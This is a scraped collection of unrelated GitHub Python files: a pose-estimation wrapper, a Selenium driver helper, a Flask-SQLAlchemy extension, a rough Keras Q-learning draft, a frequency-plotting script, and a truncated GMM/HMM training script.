+{"seq_id":"22067036382","text":"# -*- coding: UTF-8 -*-\n# @Time : 2022/9/24 20:39\n# @File : pose.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nfrom mmpose.apis import init_model, inference_topdown, inference_bottomup, Pose2DInferencer\nimport os\nimport sys\nimport subprocess\n\n\nclass Pose(object):\n def __init__(self, config_file, checkpoint_file=None, is_bottomup=True, device='cuda:0'):\n if not config_file.endswith('.py'):\n config_file = f'{config_file}.py'\n config_name = config_file.split('.')[0]\n model_folder = os.path.join(os.environ['HOME'], '.antgo', 'models', 'mmpose', config_name)\n if not os.path.exists(model_folder):\n os.makedirs(model_folder)\n\n model_file = os.path.join(model_folder, config_file)\n if not os.path.exists(model_file):\n subprocess.check_call(['mim', 'download', 'mmpose', '--config', config_name, '--dest', model_folder])\n\n if checkpoint_file is None:\n for f in os.listdir(model_folder):\n if f.endswith('.pth'):\n checkpoint_file = f\n break\n assert(checkpoint_file is not None)\n\n config_file = os.path.join(model_folder, config_file)\n checkpoint_file = os.path.join(model_folder, checkpoint_file)\n\n self.model = init_model(config_file, checkpoint_file, device=device) # or device='cuda:0'\n self.is_bottomup = is_bottomup\n\n def __call__(self, *args, **kwargs):\n pose_info = None\n if self.is_bottomup:\n pose_info, = inference_bottomup(self.model, args[0])\n else:\n pose_info, = inference_topdown(self.model, args[0])\n\n keypoints = pose_info.pred_instances.keypoints\n keypoints_scores = pose_info.pred_instances.keypoint_scores\n bboxes = pose_info.pred_instances.bboxes\n return keypoints, keypoints_scores, bboxes\n","repo_name":"jianzfb/antgo","sub_path":"antgo/pipeline/hub/external/mm/pose.py","file_name":"pose.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"438952272","text":"import json\nfrom selenium import webdriver\n\nclass CreateDriver():\n def instance(self):\n data = json.load(open('Config/config.json'))\n browser_info = data['browser']\n url = data['url']\n if browser_info =='firefox':\n driver = webdriver.Firefox()\n elif browser_info == 'chrome':\n chrome_path = 'Drivers/chromedriver.exe'\n driver = webdriver.Chrome(chrome_path)\n # driver.maximize_window()\n driver.implicitly_wait(30)\n driver.get(url)\n return driver","repo_name":"skgantayat/Assist_Automation","sub_path":"Util/Create_driver/driver_instance.py","file_name":"driver_instance.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70268510810","text":"from __future__ import with_statement, absolute_import\nimport re\nimport sys\nimport time\nimport sqlalchemy\nfrom math import ceil\nfrom functools import partial\nfrom flask import _request_ctx_stack, abort\nfrom flask.signals import Namespace\nfrom operator import itemgetter\nfrom threading import Lock\nfrom sqlalchemy import orm\nfrom sqlalchemy.orm.exc import UnmappedClassError\nfrom sqlalchemy.orm.mapper import Mapper\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.orm.interfaces import MapperExtension, SessionExtension, \\\n EXT_CONTINUE\nfrom sqlalchemy.interfaces import ConnectionProxy\nfrom sqlalchemy.engine.url import make_url\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.util import to_list\n\n# the best timer function for the platform\nif sys.platform == 'win32':\n _timer = time.clock\nelse:\n _timer = time.time\n\n\n_camelcase_re = re.compile(r'([A-Z]+)(?=[a-z0-9])')\n_signals = Namespace()\n\n\nmodels_committed = _signals.signal('models-committed')\nbefore_models_committed = _signals.signal('before-models-committed')\n\n\ndef _create_scoped_session(db, options):\n if options is None:\n options = {}\n return orm.scoped_session(partial(_SignallingSession, db, **options))\n\n\ndef _make_table(db):\n def _make_table(*args, **kwargs):\n if len(args) > 1 and isinstance(args[1], db.Column):\n args = (args[0], db.metadata) + args[1:]\n return sqlalchemy.Table(*args, **kwargs)\n return _make_table\n\n\n\ndef _include_sqlalchemy(obj):\n for module in sqlalchemy, sqlalchemy.orm:\n for key in module.__all__:\n if not hasattr(obj, key):\n setattr(obj, key, getattr(module, key))\n obj.Table = _make_table(obj)\n\n\nclass _DebugQueryTuple(tuple):\n statement = property(itemgetter(0))\n parameters = property(itemgetter(1))\n start_time = property(itemgetter(2))\n end_time = property(itemgetter(3))\n context = property(itemgetter(4))\n\n @property\n def duration(self):\n return self.end_time - self.start_time\n\n def __repr__(self):\n return '' % (\n self.statement,\n self.parameters,\n self.duration\n )\n\n\ndef _calling_context(app_path):\n frm = sys._getframe(1)\n while frm.f_back is not None:\n name = frm.f_globals.get('__name__')\n if name and (name == app_path or name.startswith(app_path + '.')):\n funcname = frm.f_code.co_name\n return '%s:%s (%s)' % (\n frm.f_code.co_filename,\n frm.f_lineno,\n funcname\n )\n frm = frm.f_back\n return ''\n\n\nclass _ConnectionDebugProxy(ConnectionProxy):\n \"\"\"Helps debugging the database.\"\"\"\n\n def __init__(self, import_name):\n self.app_package = import_name\n\n def cursor_execute(self, execute, cursor, statement, parameters,\n context, executemany):\n start = _timer()\n try:\n return execute(cursor, statement, parameters, context)\n finally:\n ctx = _request_ctx_stack.top\n if ctx is not None:\n queries = getattr(ctx, 'sqlalchemy_queries', None)\n if queries is None:\n queries = []\n setattr(ctx, 'sqlalchemy_queries', queries)\n queries.append(_DebugQueryTuple((\n statement, parameters, start, _timer(),\n _calling_context(self.app_package))))\n\n\nclass _SignalTrackingMapperExtension(MapperExtension):\n\n def after_delete(self, mapper, connection, instance):\n return self._record(mapper, instance, 'delete')\n\n def after_insert(self, mapper, connection, instance):\n return self._record(mapper, instance, 'insert')\n\n def after_update(self, mapper, connection, instance):\n return self._record(mapper, instance, 'update')\n\n def _record(self, mapper, model, operation):\n pk = tuple(mapper.primary_key_from_instance(model))\n orm.object_session(model)._model_changes[pk] = (model, operation)\n return EXT_CONTINUE\n\n\nclass _SignalTrackingMapper(Mapper):\n\n def __init__(self, *args, **kwargs):\n extensions = to_list(kwargs.pop('extension', None), [])\n extensions.append(_SignalTrackingMapperExtension())\n kwargs['extension'] = extensions\n Mapper.__init__(self, *args, **kwargs)\n\n\nclass _SignallingSessionExtension(SessionExtension):\n\n def before_commit(self, session):\n d = session._model_changes\n if d:\n before_models_committed.send(session.app, changes=d.values())\n return EXT_CONTINUE\n\n def after_commit(self, session):\n d = session._model_changes\n if d:\n models_committed.send(session.app, changes=d.values())\n d.clear()\n return EXT_CONTINUE\n\n def after_rollback(self, session):\n session._model_changes.clear()\n return EXT_CONTINUE\n\n\nclass _SignallingSession(Session):\n\n def __init__(self, db, autocommit=False, autoflush=False, **options):\n Session.__init__(self, autocommit=autocommit, autoflush=autoflush,\n extension=db.session_extensions,\n bind=db.engine, **options)\n self.app = db.app or _request_ctx_stack.top.app\n self._model_changes = {}\n\n\ndef get_debug_queries():\n \"\"\"In debug mode Flask-SQLAlchemy will log all the SQL queries sent\n to the database. This information is available until the end of request\n which makes it possible to easily ensure that the SQL generated is the\n one expected on errors or in unittesting. If you don't want to enable\n the DEBUG mode for your unittests you can also enable the query\n recording by setting the ``'SQLALCHEMY_RECORD_QUERIES'`` config variable\n to `True`. This is automatically enabled if Flask is in testing mode.\n\n The value returned will be a list of named tuples with the following\n attributes:\n\n `statement`\n The SQL statement issued\n\n `parameters`\n The parameters for the SQL statement\n\n `start_time` / `end_time`\n Time the query started / the results arrived. Please keep in mind\n that the timer function used depends on your platform. These\n values are only useful for sorting or comparing. They do not\n necessarily represent an absolute timestamp.\n\n `duration`\n Time the query took in seconds\n\n `context`\n A string giving a rough estimation of where in your application\n query was issued. The exact format is undefined so don't try\n to reconstruct filename or function name.\n \"\"\"\n return getattr(_request_ctx_stack.top, 'sqlalchemy_queries', [])\n\n\nclass Pagination(object):\n \"\"\"Internal helper class returned by :meth:`BaseQuery.paginate`. You\n can also construct it from any other SQLAlchemy query object if you are\n working with other libraries. Additionally it is possible to pass `None`\n as query object in which case the :meth:`prev` and :meth:`next` will\n no longer work.\n \"\"\"\n\n def __init__(self, query, page, per_page, total, items):\n #: the unlimited query object that was used to create this\n #: pagination object.\n self.query = query\n #: the current page number (1 indexed)\n self.page = page\n #: the number of items to be displayed on a page.\n self.per_page = per_page\n #: the total number of items matching the query\n self.total = total\n #: the items for the current page\n self.items = items\n\n @property\n def pages(self):\n \"\"\"The total number of pages\"\"\"\n return int(ceil(self.total / float(self.per_page)))\n\n def prev(self, error_out=False):\n \"\"\"Returns a :class:`Pagination` object for the previous page.\"\"\"\n assert self.query is not None, 'a query object is required ' \\\n 'for this method to work'\n return self.query.paginate(self.page - 1, self.per_page, error_out)\n\n @property\n def prev_num(self):\n \"\"\"Number of the previous page.\"\"\"\n return self.page - 1\n\n @property\n def has_prev(self):\n \"\"\"True if a previous page exists\"\"\"\n return self.page > 1\n\n def next(self, error_out=False):\n \"\"\"Returns a :class:`Pagination` object for the next page.\"\"\"\n assert self.query is not None, 'a query object is required ' \\\n 'for this method to work'\n return self.query.paginate(self.page + 1, self.per_page, error_out)\n\n @property\n def has_next(self):\n \"\"\"True if a next page exists.\"\"\"\n return self.page < self.pages\n\n @property\n def next_num(self):\n \"\"\"Number of the next page\"\"\"\n return self.page + 1\n\n def iter_pages(self, left_edge=2, left_current=2,\n right_current=5, right_edge=2):\n \"\"\"Iterates over the page numbers in the pagination. The four\n parameters control the thresholds how many numbers should be produced\n from the sides. Skipped page numbers are represented as `None`.\n This is how you could render such a pagination in the templates:\n\n .. sourcecode:: html+jinja\n\n {% macro render_pagination(pagination, endpoint) %}\n \n {% endmacro %}\n \"\"\"\n last = 0\n for num in xrange(1, self.pages + 1):\n if num <= left_edge or \\\n (num > self.page - left_current - 1 and \\\n num < self.page + right_current) or \\\n num > self.pages - right_edge:\n if last + 1 != num:\n yield None\n yield num\n last = num\n\n\nclass BaseQuery(orm.Query):\n \"\"\"The default query object used for models. This can be subclassed and\n replaced for individual models by setting the :attr:`~Model.query_class`\n attribute. This is a subclass of a standard SQLAlchemy\n :class:`~sqlalchemy.orm.query.Query` class and has all the methods of a\n standard query as well.\n \"\"\"\n\n def get_or_404(self, ident):\n \"\"\"Like :meth:`get` but aborts with 404 if not found instead of\n returning `None`.\n \"\"\"\n rv = self.get(ident)\n if rv is None:\n abort(404)\n return rv\n\n def first_or_404(self):\n \"\"\"Like :meth:`first` but aborts with 404 if not found instead of\n returning `None`.\n \"\"\"\n rv = self.first()\n if rv is None:\n abort(404)\n return rv\n\n def paginate(self, page, per_page=20, error_out=True):\n \"\"\"Returns `per_page` items from page `page`. By default it will\n abort with 404 if no items were found and the page was larger than\n 1. This behavor can be disabled by setting `error_out` to `False`.\n\n Returns an :class:`Pagination` object.\n \"\"\"\n if error_out and page < 1:\n abort(404)\n items = self.limit(per_page).offset((page - 1) * per_page).all()\n if not items and page != 1 and error_out:\n abort(404)\n return Pagination(self, page, per_page, self.count(), items)\n\n\nclass _QueryProperty(object):\n\n def __init__(self, sa):\n self.sa = sa\n\n def __get__(self, obj, type):\n try:\n mapper = orm.class_mapper(type)\n if mapper:\n return type.query_class(mapper, session=self.sa.session())\n except UnmappedClassError:\n return None\n\n\ndef _record_queries(app):\n if app.debug:\n return True\n rq = app.config['SQLALCHEMY_RECORD_QUERIES']\n if rq is not None:\n return rq\n return bool(app.config.get('TESTING'))\n\n\nclass _EngineConnector(object):\n\n def __init__(self, sa, app):\n self._sa = sa\n self._app = app\n self._engine = None\n self._connected_for = None\n self._lock = Lock()\n\n def get_engine(self):\n with self._lock:\n uri = self._app.config['SQLALCHEMY_DATABASE_URI']\n echo = self._app.config['SQLALCHEMY_ECHO']\n if (uri, echo) == self._connected_for:\n return self._engine\n info = make_url(uri)\n options = {'convert_unicode': True}\n self._sa.apply_pool_defaults(self._app, options)\n self._sa.apply_driver_hacks(self._app, info, options)\n if _record_queries(self._app):\n options['proxy'] = _ConnectionDebugProxy(self._app.import_name)\n if echo:\n options['echo'] = True\n self._engine = rv = sqlalchemy.create_engine(info, **options)\n self._connected_for = (uri, echo)\n return rv\n\n\nclass _ModelTableNameDescriptor(object):\n\n def __get__(self, obj, type):\n tablename = type.__dict__.get('__tablename__')\n if not tablename:\n def _join(match):\n word = match.group()\n if len(word) > 1:\n return ('_%s_%s' % (word[:-1], word[-1])).lower()\n return '_' + word.lower()\n tablename = _camelcase_re.sub(_join, type.__name__).lstrip('_')\n setattr(type, '__tablename__', tablename)\n return tablename\n\n\nclass Model(object):\n \"\"\"Baseclass for custom user models.\"\"\"\n\n #: the query class used. The :attr:`query` attribute is an instance\n #: of this class. By default a :class:`BaseQuery` is used.\n query_class = BaseQuery\n\n #: an instance of :attr:`query_class`. Can be used to query the\n #: database for instances of this model.\n query = None\n\n #: arguments for the mapper\n __mapper_cls__ = _SignalTrackingMapper\n\n __tablename__ = _ModelTableNameDescriptor()\n\n\nclass SQLAlchemy(object):\n \"\"\"This class is used to control the SQLAlchemy integration to one\n or more Flask applications. Depending on how you initialize the\n object it is usable right away or will attach as needed to a\n Flask application.\n\n There are two usage modes which work very similar. One is binding\n the instance to a very specific Flask application::\n\n app = Flask(__name__)\n db = SQLAlchemy(app)\n\n The second possibility is to create the object once and configure the\n application later to support it::\n\n db = SQLAlchemy()\n\n def create_app():\n app = Flask(__name__)\n db.init_app(app)\n return app\n\n The difference between the two is that in the first case methods like\n :meth:`create_all` and :meth:`drop_all` will work all the time but in\n the second case a :meth:`flask.Flask.request_context` has to exist.\n\n By default Flask-SQLAlchemy will apply some backend-specific settings\n to improve your experience with them. As of SQLAlchemy 0.6 SQLAlchemy\n will probe the library for native unicode support. If it detects\n unicode it will let the library handle that, otherwise do that itself.\n Sometimes this detection can fail in which case you might want to set\n `use_native_unicode` (or the ``SQLALCHEMY_NATIVE_UNICODE`` configuration\n key) to `False`. Note that the configuration key overrides the\n value you pass to the constructor.\n\n Additionally this class also provides access to all the SQLAlchemy\n functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.\n So you can declare models like this::\n\n class User(db.Model):\n username = db.Column(db.String(80), unique=True)\n pw_hash = db.Column(db.String(80))\n\n You may also define your own SessionExtension instances as well when\n defining your SQLAlchemy class instance. You may pass your custom instances\n to the `session_extensions` keyword. This can be either a single\n SessionExtension instance, or a list of SessionExtension instances. In the \n following use case we use the VersionedListener from the SQLAlchemy\n versioning examples.::\n\n from history_meta import VersionedMeta, VersionedListener\n\n app = Flask(__name__)\n db = SQLAlchemy(app, session_extensions=[VersionedListener()])\n\n class User(db.Model):\n __metaclass__ = VersionedMeta\n username = db.Column(db.String(80), unique=True)\n pw_hash = db.Column(db.String(80))\n\n The `session_options` parameter can be used to override session\n options. If provided it's a dict of parameters passed to the\n session's constructor.\n\n .. versionadded:: 0.10\n The `session_options` parameter was added.\n \"\"\"\n\n def __init__(self, app=None, use_native_unicode=True,\n session_extensions=None, session_options=None):\n self.use_native_unicode = use_native_unicode\n self.session_extensions = to_list(session_extensions, []) + \\\n [_SignallingSessionExtension()]\n\n self.session = _create_scoped_session(self, session_options)\n\n self.Model = declarative_base(cls=Model, name='Model')\n self.Model.query = _QueryProperty(self)\n\n self._engine_lock = Lock()\n\n if app is not None:\n self.app = app\n self.init_app(app)\n else:\n self.app = None\n\n _include_sqlalchemy(self)\n\n @property\n def metadata(self):\n \"\"\"Returns the metadata\"\"\"\n return self.Model.metadata\n\n def init_app(self, app):\n \"\"\"This callback can be used to initialize an application for the\n use with this database setup. Never use a database in the context\n of an application not initialized that way or connections will\n leak.\n \"\"\"\n app.config.setdefault('SQLALCHEMY_DATABASE_URI', 'sqlite://')\n app.config.setdefault('SQLALCHEMY_NATIVE_UNICODE', None)\n app.config.setdefault('SQLALCHEMY_ECHO', False)\n app.config.setdefault('SQLALCHEMY_RECORD_QUERIES', None)\n app.config.setdefault('SQLALCHEMY_POOL_SIZE', None)\n app.config.setdefault('SQLALCHEMY_POOL_TIMEOUT', None)\n app.config.setdefault('SQLALCHEMY_POOL_RECYCLE', None)\n\n @app.after_request\n def shutdown_session(response):\n self.session.remove()\n return response\n\n def apply_pool_defaults(self, app, options):\n def _setdefault(optionkey, configkey):\n value = app.config[configkey]\n if value is not None:\n options[optionkey] = value\n _setdefault('pool_size', 'SQLALCHEMY_POOL_SIZE')\n _setdefault('pool_timeout', 'SQLALCHEMY_POOL_TIMEOUT')\n _setdefault('pool_recycle', 'SQLALCHEMY_POOL_RECYCLE')\n\n def apply_driver_hacks(self, app, info, options):\n if info.drivername == 'mysql':\n info.query.setdefault('charset', 'utf8')\n options.setdefault('pool_size', 10)\n options.setdefault('pool_recycle', 7200)\n elif info.drivername == 'sqlite':\n pool_size = options.get('pool_size')\n # we go to memory and the pool size was explicitly set to 0\n # which is fail. Let the user know that\n if info.database in (None, '', ':memory:'):\n if pool_size == 0:\n raise RuntimeError('SQLite in memory database with an '\n 'empty queue not possible due to data '\n 'loss.')\n # if pool size is None or explicitly set to 0 we assume the\n # user did not want a queue for this sqlite connection and\n # hook in the null pool.\n elif not pool_size:\n from sqlalchemy.pool import NullPool\n options['poolclass'] = NullPool\n\n unu = app.config['SQLALCHEMY_NATIVE_UNICODE']\n if unu is None:\n unu = self.use_native_unicode\n if not unu:\n options['use_native_unicode'] = False\n\n @property\n def engine(self):\n \"\"\"Gives access to the engine. If the database configuration is bound\n to a specific application (initialized with an application) this will\n always return a database connection. If however the current application\n is used this might raise a :exc:`RuntimeError` if no application is\n active at the moment.\n \"\"\"\n with self._engine_lock:\n if self.app is not None:\n app = self.app\n else:\n ctx = _request_ctx_stack.top\n if ctx is not None:\n app = ctx.app\n else:\n raise RuntimeError('application not registered on db '\n 'instance and no application bound '\n 'to current context')\n connector = getattr(app, '_sqlalchemy_connector', None)\n if connector is None:\n connector = _EngineConnector(self, app)\n app._sqlalchemy_connector = connector\n return connector.get_engine()\n\n def create_all(self):\n \"\"\"Creates all tables.\"\"\"\n self.Model.metadata.create_all(bind=self.engine)\n\n def drop_all(self):\n \"\"\"Drops all tables.\"\"\"\n self.Model.metadata.drop_all(bind=self.engine)\n\n def reflect(self):\n \"\"\"Reflects tables from the database.\"\"\"\n self.Model.metadata.reflect(bind=self.engine)\n\n def __repr__(self):\n app = None\n if self.app is not None:\n app = self.app\n else:\n ctx = _request_ctx_stack.top\n if ctx is not None:\n app = ctx.app\n return '<%s engine=%r>' % (\n self.__class__.__name__,\n app and app.config['SQLALCHEMY_DATABASE_URI'] or None\n )\n","repo_name":"yxm0513/flask-ims","sub_path":"flaskext/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":22210,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"42324813060","text":"#import gym\nimport numpy as np\nfrom random import randint\n#from gym.spaces import Box, Discrete\nfrom keras.models import Model\nfrom keras.layers import Input, Dense, Lambda,merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras import backend as K\nfrom keras.models import Sequential\nfrom numpy.random import *\nimport argparse\nimport OSC\nimport matplotlib.pyplot as plt\n\n\nclass QLearn:\n __BATCH_SIZE=100\n __EXPLORATION=0.001\n __NUM_INPUT=4\n __NUM_OUTPUT=10\n __MIN_TRAIN=100\n __TRAIN_REPEAT=100\n __GANMMA=0.90\n __DISPLY=True\n __NUM_ACTIONS=5\n prestates = []\n actions = []\n rewards = []\n poststates = []\n terminals = []\n total_reward = 0\n episode_reward=0\n observation = np.array([0,0,0,0])\n action =[0]\n\n\n #env = gym.make('Pendulum-v0')\n\n\n def __init__(self):\n status,action_0,action_1,action_2,action_3,action_4,out = self.createLayers(self.__NUM_INPUT,self.__NUM_OUTPUT)\n ###########make caluculation Model#################\n self.model = Model(input=[x,a0], output=z)\n\n self.model.summary()\n status,action_0,action_1,action_2,action_3,action_4,out = self.createLayers(self.__NUM_INPUT,self.__NUM_OUTPUT)\n #target_model = Model(input=x, output=z)\n #target_model.set_weights(self.model.get_weights())\n self.model.compile(optimizer='adam', loss='mse')\n\n\n def createLayers(self,num_input,num_output):\n #x = Input(shape=env.observation_space.shape)\n #i=3\n status = Input(shape=(num_input,),name='x')\n action_0 = Input(shape=(5,), name='a0')\n action_1 = Input(shape=(5,), name='a1')\n action_2 = Input(shape=(5,), name='a2')\n action_3 = Input(shape=(5,), name='a3')\n\n x = merge([status,action_0,action_1,action_2,action_3], mode='concat')\n\n #x = Input(shape=(num_input,))#########input_NUM\n\n h = x\n h = Dense(64, activation='tanh')(h)\n h = Dense(64, activation='tanh')(h)\n h = Dense(64, activation='tanh')(h)\n h = Dense(64, activation='tanh')(h)\n\n y = Dense(64,input_shape=(64,))(h)\n out = Dense(num_output,input_shape=(64,))(y)\n\n\n #z = Dense(num_output,input_shape=(64,))(y)\n #print('z:',z)\n #return x, z\n return status,action_0,action_1,action_2,action_3,action_4,out\n\n###########################################################\n###########################################################\n\n def resetParametors(self):\n ######reset per repetition\n #self.env.reset()\n self.episode_reward = 0\n\n def getAction(self):\n\n if np.random.random() < self.__EXPLORATION:\n for i in range(self.__NUM_ACTIONS):\n self.action[i]=elf.__getRandomAction()\n else:\n s = np.array([self.observation])\n q = self.model.predict(s, batch_size=10)##########\n self.action = [np.argmax(q[0])]\n print(\"Action:\",self.action)\n print(q)\n\n return self.action\n\n\n def __setQ(self,NUM_ACTION,NUM_INPUT):\n allCase=int(numInput**numAction)\n for i in range(allCase):\n a0,a1,a2,a3=self.__getActionFromNum(i,NUM_ACTION,NUM_INPUT)\n __q = self.model.predict(s,a0,a1,a2,a3, batch_size=10)\n q.append(__q)\n self.action = [np.argmax(q[0])]\n\n\n def __getActionFromNum(self,num,NUM_ACTION,NUM_INPUT):\n a0= num% NUM_INPUT\n num=int(num/NUM_INPUT)\n a1=num% NUM_INPUT\n num=int(num/NUM_INPUT)\n a2=num% NUM_INPUT\n num=int(num/NUM_INPUT)\n a3=num% NUM_INPUT\n return a0,a1,a2,a0\n\n\n\n def __getRandomAction(self):\n action=[randint(0,self.__NUM_OUTPUT)]\n print(action)\n return action\n\n\n def preProcces(self,action,observation):\n self.prestates.append(observation)\n self.actions.append(action)\n\n###########################################################\n###########################################################\n\n def setStatus(self,observation,reward,done,info):\n self.rewards.append(reward)\n self.poststates.append(observation)\n self.terminals.append(done)\n self.episode_reward += reward\n self.observation=observation\n #print(type(self.poststates))\n\n self.printStatus(observation,reward,done,info)\n\n def printStatus(self,observation,reward,done,info):\n print(\"observation:\",observation)\n print(\"reward:\",reward)\n print(\"done:\",done)\n print(\"info:\",info)\n print (\"rewards:\",self.episode_reward)\n\n\n def postProcces(self):\n if len(self.prestates) > self.__MIN_TRAIN:\n indexes=self.__getIndexes()\n self.__calculateQLerning(indexes)\n\n\n def __getIndexes(self):\n for k in range(self.__TRAIN_REPEAT):\n if len(self.prestates) > self.__BATCH_SIZE:\n indexes = np.random.choice(len(self.prestates), size=self.__BATCH_SIZE)\n else:\n indexes = range(len(self.prestates))\n return indexes\n\n\n def __calculateQLerning(self,indexes):\n #########prediction per repitation################\n qpre = self.model.predict(np.array(self.prestates)[indexes])\n qpost = self.model.predict(np.array(self.poststates)[indexes])\n\n #print(\"prestates:\",self.prestates)\n #print(\"poststates:\",self.poststates)\n\n for i in range(len(indexes)):\n actionIndex=self.actions[indexes[i]]\n if self.terminals[indexes[i]]:\n qpre[i, actionIndex] = self.rewards[indexes[i]]\n else:\n qpre[i, actionIndex] = self.rewards[indexes[i]] + self.__GANMMA * np.amax(qpost[i])\n\n ##########Single gradient update over one batch of samples.###############\n #print (qpre)\n loss=self.model.train_on_batch(np.array(self.prestates)[indexes], qpre)\n print (\"loss:\",loss)\n\n#############################################################\n##############################################################\n #def render(self):\n #self.env.render()\n","repo_name":"y1sakamoto/Study","sub_path":"QLearnOSCBullet0227/QLearn4Out0228.py","file_name":"QLearn4Out0228.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35693279714","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\ninputFileName = sys.argv[1]\n\nl, n, f, m = np.loadtxt(fname=inputFileName,usecols=(0,1,2,3),unpack=True)\nmax_l = int(l[len(l)-1] + 1)\n\n# # Load frequencies and mode inertias into frequencies array.\n# # frequencies is an array of arrays corresponding to l modes\n# # each l mode array holds an array corresponding to n modes\n# # each n mode array holds the frequency, and the mode inertia\n# frequencies = []\n# frequencies.append([])\n# l = 0\n# for i in range(len(data[0])):\n# if (data[0][i] > l):\n# frequencies.append([])\n# l = l + 1\n# frequencies[l].append( [data[2][i], data[3][i] ])\n\nl_modes = []\nfor i in range(max_l):\n l_modes.append([[],[]])\n\nfor i in range(len(l)):\n if (n[i] > 0):\n print(l[i])\n l_modes[int(l[i])][0].append(f[i])\n l_modes[int(l[i])][1].append(m[i])\n\nfor i in range(max_l):\n plt.plot(l_modes[i][0],l_modes[i][1],'.')\n\n# for i in range(len(frequencies)):\n# l_modes.append([[],[]])\n# for j in range(len(frequencies[i])):\n# l_modes[i][0].append(frequencies[i][j][0])\n# l_modes[i][1].append(frequencies[i][j][1])\n# plt.plot(l_modes[i][0],l_modes[i][1],'.')\n\nplt.axes().set_yscale('log')\nplt.ylabel(\"Mode inertia\")\nplt.xlabel(r\"Frequency $\\nu$/Hz\")\nplt.savefig(\"ModeInertiasExample\")\n","repo_name":"kroffo/MPS-Internship-Code","sub_path":"bumpAnalysis/.adipls-freq-files/plotInertias.py","file_name":"plotInertias.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30580531387","text":"import argparse\nimport logging\nimport numpy as np\n\n\ndef elog(x):\n res = np.log(x, where=(x != 0))\n res[np.where(x == 0)] = -(10.0 ** 8)\n return (res)\n\n\ndef get_data_dict(data):\n data_dict = {}\n for line in data:\n if \"[\" in line:\n key = line.split()[0]\n mat = []\n elif \"]\" in line:\n line = line.split(']')[0]\n mat.append([float(x) for x in line.split()])\n data_dict[key] = np.array(mat)\n else:\n mat.append([float(x) for x in line.split()])\n return data_dict\n\n\ndef logSumExp(x, axis=None, keepdims=False):\n x_max = np.max(x, axis=axis, keepdims=keepdims)\n x_diff = x - x_max\n sumexp = np.exp(x_diff).sum(axis=axis, keepdims=keepdims)\n return (x_max + np.log(sumexp))\n\n\ndef exp_normalize(x, axis=None, keepdims=False):\n b = x.max(axis=axis, keepdims=keepdims)\n y = np.exp(x - b)\n return y / y.sum(axis=axis, keepdims=keepdims)\n\n\ndef compute_ll(data, mu, r):\n # Compute log-likelihood of a single n-dimensional data point, given a single\n # mean and variance\n ll = (- 0.5 * elog(r) - np.divide(\n np.square(data - mu), 2 * r) - 0.5 * np.log(2 * np.pi)).sum()\n return ll\n\n\ndef forward(pi, a, o, mu, r):\n \"\"\"\n Computes forward log-probabilities of all states\n at all time steps.\n Inputs:\n pi: initial probability over states\n a: transition matrix\n o: observed n-dimensional data sequence\n mu: means of Gaussians for each state\n r: variances of Gaussians for each state\n \"\"\"\n T = o.shape[0]\n J = mu.shape[0]\n\n log_alpha = np.zeros((T, J))\n log_alpha[0] = elog(pi)\n\n log_alpha[0] += np.array([compute_ll(o[0], mu[j], r[j])\n for j in range(J)])\n\n for t in range(1, T):\n for j in range(J):\n log_alpha[t, j] = compute_ll(o[t], mu[j], r[j]) + logSumExp(elog(a[:, j].T) + log_alpha[t - 1])\n\n return log_alpha\n\n\ndef backward(a, o, mu, r):\n \"\"\"\n Computes backward log-probabilities of all states\n at all time steps.\n Inputs:\n a: transition matrix\n o: observed n-dimensional data\n mu: means of Gaussians for each state\n r: variances of Gaussians for each state\n \"\"\"\n T = o.shape[0]\n J = mu.shape[0]\n log_beta = np.zeros((T, J))\n\n log_a = elog(a)\n\n for t in reversed(range(T - 1)):\n for i in range(J):\n x = []\n for j in range(J):\n x.append(compute_ll(o[t + 1], mu[j], r[j]) + log_beta[t + 1, j] + log_a[i, j])\n\n log_beta[t, i] = logSumExp(np.array(x))\n\n return log_beta\n\n\nclass SingleGauss():\n def __init__(self):\n # Basic class variable initialized, feel free to add more\n self.dim = None\n self.mu = None\n self.r = None\n\n def train(self, data):\n # Function for training single modal Gaussian\n T, self.dim = data.shape\n\n self.mu = np.mean(data, axis=0)\n self.r = np.mean(np.square(np.subtract(data, self.mu)), axis=0)\n return\n\n def loglike(self, data_mat):\n # Function for calculating log likelihood of single modal Gaussian\n lls = [compute_ll(frame, self.mu, self.r) for frame in data_mat.tolist()]\n ll = np.sum(np.array(lls))\n return ll\n\n\nclass GMM():\n\n def __init__(self, sg_model, ncomp):\n # Basic class variable initialized, feel free to add more\n self.mu = np.tile(sg_model.mu, (ncomp, 1))\n for k in range(ncomp):\n eps_k = np.random.randn()\n self.mu[k] += 0.01 * eps_k * np.sqrt(sg_model.r)\n self.r = np.tile(sg_model.r, (ncomp, 1))\n self.omega = np.ones(ncomp) / ncomp\n self.ncomp = ncomp\n\n def e_step(self, data):\n gamma = np.zeros((data.shape[0], self.ncomp))\n for t in range(data.shape[0]):\n log_gamma_t = np.log(self.omega)\n for k in range(self.ncomp):\n log_gamma_t[k] += compute_ll(data[t], self.mu[k], self.r[k])\n gamma[t] = exp_normalize(log_gamma_t)\n return gamma\n\n def m_step(self, data, gamma):\n self.omega = np.sum(gamma, axis=0) / np.sum(gamma)\n\n denom = np.sum(gamma, axis=0, keepdims=True).T\n\n mu_num = np.zeros_like(self.mu)\n for k in range(self.ncomp):\n mu_num[k] = np.sum(np.multiply(data, np.expand_dims(gamma[:, k], axis=1)), axis=0)\n\n self.mu = np.divide(mu_num, denom)\n\n r_num = np.zeros_like(self.r)\n for k in range(self.ncomp):\n r_num[k] = np.sum(np.multiply(np.square(np.subtract(data, self.mu[k])),\n 